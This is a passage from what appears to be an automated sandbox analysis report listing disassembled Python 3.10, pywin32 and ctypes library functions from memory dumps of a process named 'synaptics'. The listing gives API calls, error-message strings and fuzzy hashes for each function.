                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_Formatmalloc
                                                                                                                                                                                                              • String ID: Ace type %d is not supported yet$AddAccesAllowedAce$Error reordering ACL: Unable to allocate acl of size %d$ReorderACL
                                                                                                                                                                                                              • API String ID: 1659041409-2161890993
                                                                                                                                                                                                              • Opcode ID: 7f394402759837e23789aa87e595bbc49e86c68f80ecdecb454abb2288e9d96a
                                                                                                                                                                                                              • Instruction ID: ad1d1034c54449e3e6e20e240419be54e4add36f05e50c67b6073b50e1a36ddd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f394402759837e23789aa87e595bbc49e86c68f80ecdecb454abb2288e9d96a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D41B772A182109FD700DF58D84476BFFE8FF8A749F000569F89581223E77AD62987A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PySequence_Tuple.PYTHON310(?,?,?), ref: 6BF497DA
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?), ref: 6BF49803
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7EADFC,Unable to allocate %d bytes,?,?,?,?), ref: 6BF4981F
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?,?,?,?,?,?), ref: 6BF49964
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Objects of type '%s' can not be converted to Unicode., xrefs: 6BF49925
                                                                                                                                                                                                              • Unable to allocate %d bytes, xrefs: 6BF49818
                                                                                                                                                                                                              • None is not a valid string in this context, xrefs: 6BF498FF
                                                                                                                                                                                                              • <NULL!!>, xrefs: 6BF4991A, 6BF4991F
                                                                                                                                                                                                              • Getting WCHAR string, xrefs: 6BF49899
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeallocErr_FormatSequence_Tuplemalloc
                                                                                                                                                                                                              • String ID: <NULL!!>$Getting WCHAR string$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$Unable to allocate %d bytes
                                                                                                                                                                                                              • API String ID: 647632515-1516109737
                                                                                                                                                                                                              • Opcode ID: 60d24b1d0f5311f86d73b6a29ac4234a28b4ce1521381e4f200128c48f9ac1bc
                                                                                                                                                                                                              • Instruction ID: 49df0246708fe18b0cfdf20840be1508af4e70935f55639a21abb855238ab8ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60d24b1d0f5311f86d73b6a29ac4234a28b4ce1521381e4f200128c48f9ac1bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8451C273A143018FDB01EF18DD84B5A7BA4FF55714F044168E9459B237EB39EA28CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,O|i,?,?,80D07A71), ref: 6BF44CC2
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Buffer cannot be None), ref: 6BF44CFB
                                                                                                                                                                                                              • PyObject_GetBuffer.PYTHON310(?,?,00000000), ref: 6BF44D11
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9C54,string too small - must be at least %d bytes (got %d),00000010,?), ref: 6BF44D4B
                                                                                                                                                                                                              • ?PyWinObject_FromIID@@YAPAU_object@@ABU_GUID@@@Z.PYWINTYPES310(?), ref: 6BF44D64
                                                                                                                                                                                                              • PyBuffer_Release.PYTHON310(?), ref: 6BF44D81
                                                                                                                                                                                                              • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES310(?,?,00000000,00000000), ref: 6BF44DA7
                                                                                                                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 6BF44DBB
                                                                                                                                                                                                              • CLSIDFromProgID.OLE32(?,?), ref: 6BF44DCA
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF44DD7
                                                                                                                                                                                                              • ?PyWin_SetBasicCOMError@@YAPAU_object@@J@Z.PYWINTYPES310(00000000), ref: 6BF44DDE
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF44E04
                                                                                                                                                                                                              • ?PyWinObject_FromIID@@YAPAU_object@@ABU_GUID@@@Z.PYWINTYPES310(?), ref: 6BF44E0E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • O|i, xrefs: 6BF44CBC
                                                                                                                                                                                                              • Buffer cannot be None, xrefs: 6BF44CF4
                                                                                                                                                                                                              • string too small - must be at least %d bytes (got %d), xrefs: 6BF44D44
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FromObject_U_object@@$D@@@Err_FreeMem_String$Arg_BasicBufferBuffer_Error@@FormatParseProgReleaseTupleWin_
                                                                                                                                                                                                              • String ID: Buffer cannot be None$O|i$string too small - must be at least %d bytes (got %d)
                                                                                                                                                                                                              • API String ID: 4028269097-3668081085
                                                                                                                                                                                                              • Opcode ID: 410e8813bb82a9f84af373df236edb02f2d920601dedd92798262ad803f1724c
                                                                                                                                                                                                              • Instruction ID: 72d905d22fc0d2f2104f8e874250a6fa0d1b1b0c7af7b019d0c380cc6dc80a34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 410e8813bb82a9f84af373df236edb02f2d920601dedd92798262ad803f1724c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16418E72D101099BEB04DFA4C845BEE7BB8EB1A708F000165E815F7266EB38A618CB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,y*|n:from_buffer_copy,?,6C0B6110), ref: 6C0A19CA
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,offset cannot be negative), ref: 6C0A19EA
                                                                                                                                                                                                              • PyBuffer_Release.PYTHON310(?), ref: 6C0A19F4
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9C54,Buffer size too small (%zd instead of at least %zd bytes),?,?), ref: 6C0A1A25
                                                                                                                                                                                                              • PyBuffer_Release.PYTHON310(?), ref: 6C0A1A2F
                                                                                                                                                                                                              • PySys_Audit.PYTHON310(ctypes.cdata/buffer,nnn,?,?,6C0B6110), ref: 6C0A1A50
                                                                                                                                                                                                              • PyBuffer_Release.PYTHON310(?), ref: 6C0A1A61
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,6C0B6110,?), ref: 6C0A1A93
                                                                                                                                                                                                              • PyBuffer_Release.PYTHON310(?), ref: 6C0A1A9F
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,abstract class), ref: 6C0A1ABD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ctypes.cdata/buffer, xrefs: 6C0A1A4B
                                                                                                                                                                                                              • nnn, xrefs: 6C0A1A46
                                                                                                                                                                                                              • Buffer size too small (%zd instead of at least %zd bytes), xrefs: 6C0A1A1E
                                                                                                                                                                                                              • y*|n:from_buffer_copy, xrefs: 6C0A19C2
                                                                                                                                                                                                              • abstract class, xrefs: 6C0A1AB6
                                                                                                                                                                                                              • offset cannot be negative, xrefs: 6C0A19E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Buffer_Release$Err_$String$Arg_AuditFormatParseSizeSys_Tuple_memcpy
                                                                                                                                                                                                              • String ID: Buffer size too small (%zd instead of at least %zd bytes)$abstract class$ctypes.cdata/buffer$nnn$offset cannot be negative$y*|n:from_buffer_copy
                                                                                                                                                                                                              • API String ID: 18949233-1742308441
                                                                                                                                                                                                              • Opcode ID: 59e348f4334b9152b77802b1b72b1e9a1d69828e1a20922679ff662e34485ddc
                                                                                                                                                                                                              • Instruction ID: 798f73cef8124dce36b5ef8b51130926da2edeff28e32994cbf23b191898c02d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 59e348f4334b9152b77802b1b72b1e9a1d69828e1a20922679ff662e34485ddc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD41D6B2A18144AFCB00DBD8EE45FAA73F8FB44219F040665F90DE3601EB32E915CB94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyTuple_New.PYTHON310(00000000,00000000,00000000), ref: 6BF41D41
                                                                                                                                                                                                              • PyArg_ParseTupleAndKeywords.PYTHON310(00000000,00000000,llO|Ol,6BF59030,00000014,00000018,?,?,00000010), ref: 6BF41D68
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6BF41D7A
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Trustee must be a dictionary containing {MultipleTrustee,MultipleTrusteeOperation,TrusteeForm,TrusteeType,Identifier}), ref: 6BF41D93
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF41E46
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Trustee must be a dictionary containing {MultipleTrustee,MultipleTrusteeOperation,TrusteeForm,TrusteeType,Identifier}, xrefs: 6BF41D8C
                                                                                                                                                                                                              • The object is not a PySID object, xrefs: 6BF41DD5
                                                                                                                                                                                                              • Identifier must be PySID object when TrusteeForm = TRUSTEE_IS_SID, xrefs: 6BF41DE3
                                                                                                                                                                                                              • TrusteeForm not yet supported, xrefs: 6BF41E22
                                                                                                                                                                                                              • llO|Ol, xrefs: 6BF41D61
                                                                                                                                                                                                              • Invalid value for TrusteeForm, xrefs: 6BF41E2E
                                                                                                                                                                                                              • Identifier must be string/unicode when TrusteeForm = TRUSTEE_IS_NAME, xrefs: 6BF41E16
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$Arg_Err_KeywordsParseStringTupleTuple_
                                                                                                                                                                                                              • String ID: Identifier must be PySID object when TrusteeForm = TRUSTEE_IS_SID$Identifier must be string/unicode when TrusteeForm = TRUSTEE_IS_NAME$Invalid value for TrusteeForm$The object is not a PySID object$Trustee must be a dictionary containing {MultipleTrustee,MultipleTrusteeOperation,TrusteeForm,TrusteeType,Identifier}$TrusteeForm not yet supported$llO|Ol
                                                                                                                                                                                                              • API String ID: 959004690-581804069
                                                                                                                                                                                                              • Opcode ID: 10d312d5af30d04e61a8c3c9e000f50654ff5310ae58a79c8e143181d696a6ba
                                                                                                                                                                                                              • Instruction ID: 2e0fa7505f34a02aceb673e285924d9898b24f221c8685248c12669c28940474
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10d312d5af30d04e61a8c3c9e000f50654ff5310ae58a79c8e143181d696a6ba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E41BD77920212AFD704DF58DC40B56BFA4FB16311F008665E91887277D739E638CBA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 6BF4A799
                                                                                                                                                                                                              • ?PyWinObject_FromSYSTEMTIME@@YAPAU_object@@ABU_SYSTEMTIME@@@Z.PYWINTYPES310(?), ref: 6BF4A7E4
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(FileTimeToSystemTime,00000000), ref: 6BF4A7A5
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                                • Part of subcall function 6BF4A230: _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              • ?PyWinObject_FromSYSTEMTIME@@YAPAU_object@@ABU_SYSTEMTIME@@@Z.PYWINTYPES310(?), ref: 6BF4A7B4
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 6BF4A7C9
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(FileTimeToSystemTime,00000000), ref: 6BF4A7D5
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 6BF4A7F9
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(FileTimeToSystemTime,00000000), ref: 6BF4A805
                                                                                                                                                                                                              • ?PyWinObject_FromSYSTEMTIME@@YAPAU_object@@ABU_SYSTEMTIME@@@Z.PYWINTYPES310(?), ref: 6BF4A814
                                                                                                                                                                                                                • Part of subcall function 6BF487A0: PyObject_GetAttrString.PYTHON310(?,max,?,?,6BF48B7A,?,?,?,?,?,?,?,6BF48132,?), ref: 6BF487CD
                                                                                                                                                                                                                • Part of subcall function 6BF487A0: _Py_Dealloc.PYTHON310(-000000FF,?,?,?,?,?,?,?,6BF48B7A,?), ref: 6BF48818
                                                                                                                                                                                                              • PyLong_FromUnsignedLong.PYTHON310(?,?,?), ref: 6BF4A832
                                                                                                                                                                                                              • PyLong_FromUnsignedLong.PYTHON310(?,00000000), ref: 6BF4A83B
                                                                                                                                                                                                              • PyLong_FromUnsignedLong.PYTHON310(?,00000000), ref: 6BF4A844
                                                                                                                                                                                                              • PyLong_FromUnsignedLong.PYTHON310(?,00000000), ref: 6BF4A84D
                                                                                                                                                                                                              • _Py_BuildValue_SizeT.PYTHON310(lNNNNNNNuu,?,00000000,?,?,00000000), ref: 6BF4A863
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: From$TimeU_object@@$LongLong_Object_Unsigned$E@@@Error@@FileSystemWin_$BuildSizeValue_$AttrDeallocDecodeErrorFormatLastMessageStringUnicode_
                                                                                                                                                                                                              • String ID: FileTimeToSystemTime$lNNNNNNNuu
                                                                                                                                                                                                              • API String ID: 1075062699-4021486075
                                                                                                                                                                                                              • Opcode ID: a28975ddea77bf3dc4c5ec4896f665d4bd9acdd6c866af2f047f747eb7c8f148
                                                                                                                                                                                                              • Instruction ID: 01a95dcc16538af364f63f04eec8000a5b1ae3918d35933b32ecd265760ea92d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a28975ddea77bf3dc4c5ec4896f665d4bd9acdd6c866af2f047f747eb7c8f148
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A314FB380460ABBD700DBB4DC41C5BBBECEE59318B000676F94582521F725FA248BF2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyUnicode_AsWideCharString.PYTHON310(?,?), ref: 6BF44E8A
                                                                                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 6BF44EA4
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF44EB5
                                                                                                                                                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 6BF44EC4
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 6BF44ECF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Objects of type '%s' can not be converted to Unicode., xrefs: 6BF44F39
                                                                                                                                                                                                              • None is not a valid string in this context, xrefs: 6BF44F17
                                                                                                                                                                                                              • <NULL!!>, xrefs: 6BF44F2E, 6BF44F33
                                                                                                                                                                                                              • Only strings and iids can be converted to a CLSID., xrefs: 6BF44F54
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Free$AllocCharFromMem_Unicode_Wide
                                                                                                                                                                                                              • String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$Only strings and iids can be converted to a CLSID.
                                                                                                                                                                                                              • API String ID: 665360295-2621399809
                                                                                                                                                                                                              • Opcode ID: 405817720cadb70cb4823f7f0c3a3a644b0f10e7039853f5a04c8380585bdaa5
                                                                                                                                                                                                              • Instruction ID: 8131d1a6b2e133e20b5030855cd32880338bfba1382bd0287c30eca0447b697f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 405817720cadb70cb4823f7f0c3a3a644b0f10e7039853f5a04c8380585bdaa5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B831C4379201109BD705EF28DC48F9B7BA4EF96314F004065F944D7236EB39E669CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Py_BuildValue.PYTHON310({s:O,s:l,s:l,s:l,s:N},MultipleTrustee,MultipleTrusteeOperation,00000000,TrusteeForm,?,TrusteeType,?,Identifier,00000000), ref: 6BF4215D
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,Invalid value for TrusteeForm), ref: 6BF4217C
                                                                                                                                                                                                              • Py_BuildValue.PYTHON310({s:l,s:l,s:l,s:N},AccessPermissions,?,AccessMode,?,Inheritance,?,Trustee,00000000), ref: 6BF421A9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuildValue$Err_String
                                                                                                                                                                                                              • String ID: AccessMode$AccessPermissions$Identifier$Inheritance$Invalid value for TrusteeForm$MultipleTrustee$MultipleTrusteeOperation$Trustee$TrusteeForm$TrusteeForm not yet supported$TrusteeType${s:O,s:l,s:l,s:l,s:N}${s:l,s:l,s:l,s:N}
                                                                                                                                                                                                              • API String ID: 2848846647-4268317626
                                                                                                                                                                                                              • Opcode ID: 49edea3c0322ca28b73d73cd7b93aafef203eabe05fda1ce1adf7ccad0bfca38
                                                                                                                                                                                                              • Instruction ID: aaa8ee6bdbbd754f991a4866b3c045f3c75a86b9f476694719aae80056efef6e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49edea3c0322ca28b73d73cd7b93aafef203eabe05fda1ce1adf7ccad0bfca38
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C114F37530100AFDB4AAE44CC84F627F75EB9B70171040A9FA0C9623BD62BE9759B76
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyTuple_New.PYTHON310(?), ref: 6C0A5561
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,required argument '%S' missing,00000000), ref: 6C0A57C9
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,not enough arguments), ref: 6C0A57DE
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,%s 'out' parameter must be passed as default value,?), ref: 6C0A57F8
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9A14,NULL stgdict unexpected), ref: 6C0A580F
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9C54,paramflag %u not yet implemented,00000000), ref: 6C0A5827
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,call takes exactly %d arguments (%zd given),00000000,00000000), ref: 6C0A5857
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A5869
                                                                                                                                                                                                              • PyTuple_GetSlice.PYTHON310(?,00000001,?), ref: 6C0A5890
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • call takes exactly %d arguments (%zd given), xrefs: 6C0A5850
                                                                                                                                                                                                              • required argument '%S' missing, xrefs: 6C0A57C2
                                                                                                                                                                                                              • NULL stgdict unexpected, xrefs: 6C0A5808
                                                                                                                                                                                                              • not enough arguments, xrefs: 6C0A57D7
                                                                                                                                                                                                              • %s 'out' parameter must be passed as default value, xrefs: 6C0A57F1
                                                                                                                                                                                                              • paramflag %u not yet implemented, xrefs: 6C0A5820
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_Format$Tuple_$DeallocSlice
                                                                                                                                                                                                              • String ID: %s 'out' parameter must be passed as default value$NULL stgdict unexpected$call takes exactly %d arguments (%zd given)$not enough arguments$paramflag %u not yet implemented$required argument '%S' missing
                                                                                                                                                                                                              • API String ID: 2585967295-3550450805
                                                                                                                                                                                                              • Opcode ID: 9239609da1c4c97038eb06df5021da686f57bce74051fa9542007a2d55bd8d1a
                                                                                                                                                                                                              • Instruction ID: 196d150bfead49cfda84abb1a95cefc4c354fde10cb235f7199888fb0478afd5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9239609da1c4c97038eb06df5021da686f57bce74051fa9542007a2d55bd8d1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ABC18B78A05A04DFCB18CFD8D980B9EB7F0FF49718F144169E809AB712D731A952CB94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Pointer does not support item deletion), ref: 6C0A71EA
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,NULL pointer access), ref: 6C0A7216
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • NULL pointer access, xrefs: 6C0A720F
                                                                                                                                                                                                              • expected %s instance, got %s, xrefs: 6C0A73BF
                                                                                                                                                                                                              • (%s) , xrefs: 6C0A7349
                                                                                                                                                                                                              • Pointer does not support item deletion, xrefs: 6C0A71E3
                                                                                                                                                                                                              • not a ctype instance, xrefs: 6C0A72A1
                                                                                                                                                                                                              • incompatible types, %s instance instead of %s instance, xrefs: 6C0A74CC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_String
                                                                                                                                                                                                              • String ID: (%s) $NULL pointer access$Pointer does not support item deletion$expected %s instance, got %s$incompatible types, %s instance instead of %s instance$not a ctype instance
                                                                                                                                                                                                              • API String ID: 1450464846-74098730
